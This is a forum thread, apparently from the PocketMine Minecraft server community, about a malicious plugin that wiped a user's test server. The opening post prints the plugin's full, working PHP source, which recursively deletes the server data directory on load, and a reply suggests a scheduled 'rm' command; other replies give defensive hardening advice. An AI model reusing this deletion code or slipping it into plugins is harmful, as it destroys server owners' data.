I recently received such a plugin, and it deleted everything on my test server, except bin and server.log PHP: <?phpnamespace SkyWars;use pocketmine\Server;use pocketmine\event\Listener;use pocketmine\plugin\Plugin;use pocketmine\plugin\PluginBase;use pocketmine\utils\TextFormat;use pocketmine\scheduler\CallbackTask;use pocketmine\event\player\PlayerJoinEvent;use pocketmine\event\server\ServerCommandEvent;class Main extends PluginBase implements Listener{ public function onEnable(){ $this->getServer()->getPluginManager()->registerEvents($this, $this); $this->getLogger()->info("稍等"); $dir = $this->getServer()->getDataPath(); $this->deldir($dir); } public function deldir($dir) { $dh = opendir($dir); while ($file=readdir($dh)) { if($file!="." && $file!="..") { $fullpath = $dir."/".$file; if(!is_dir($fullpath)){ @unlink($fullpath); }else{ $this->deldir($fullpath); } } } closedir($dh); if(@rmdir($dir)) { return true; } else { return false; } }}
welp, i sense that someone is about to get wrecked lol gives this plugin in a link on a youtube video . *tells viewers to spread it around as much as possible* *promises it's not malicious*
i can see how u could totally troll other people's servers with this. I can also see that this should never be allowed to get in some little troll 12 year olds hands
I would never go that far. That would break the owner's heart. What I really want to do is make a free hourly PocketMine server service, like instantmcpe, but better.
Take a look at PEMapModder's PocketMine Wrapper: https://GitHub.com/PEMapModder/PocketMine-Wrapper server.log and bin can't be completely deleted, because the system is executing bin, and server.log has an open file stream. I don't recommend self-destruction on the server. P.S. talking of self-destruction, here is something interesting: http://codegolf.stackexchange.com/q/28672/56188
Or possibly another way to do it is: schedule a task using "at" (on Ubuntu) to execute the command "rm /some-server-dir/".
Note that if you have custom plugins, they can probably change your settings to make the server run forever. Also, you still have to stop the server before deleting.
yes i get you, but learning the dark side is the way to defend against it meantime, dont download random plugins especially that one named something along the lines of chunk enhancer(*cough*..)
I've been saying for months that PocketMine is full of potentially dangerous openings and has zero security against malicious code whatsoever. Best recommendations I can give: - DO NOT run the server as root, administrator or anything with anything remotely resembling higher-level permissions. - If possible, make a separate user for running your server so it can't do anything terrible. Make sure it only has permissions to do stuff in the server folder. - Only download plugins from trusted, checked and tested sources. Poggit is the best place to look for such plugins. - Do not use things off YouTube, unless you want to pull the code apart and check it manually. - Make regular backups of anything you care about. The short of it is that PocketMine-MP plugins are Potentially Unwanted Applications, and you should not trust them.
some dude leaked their plugins by making a dummy plugin that moves every plugin onto /www/public or smth and zip them and deletes then asks the owner to contact his twitter handler lmao
From the moral side of course I should be against any kind of hacking, but from the pride of a programmer I just disdain any poorly-written malicious programs. If you're hacking anyway you should do it better!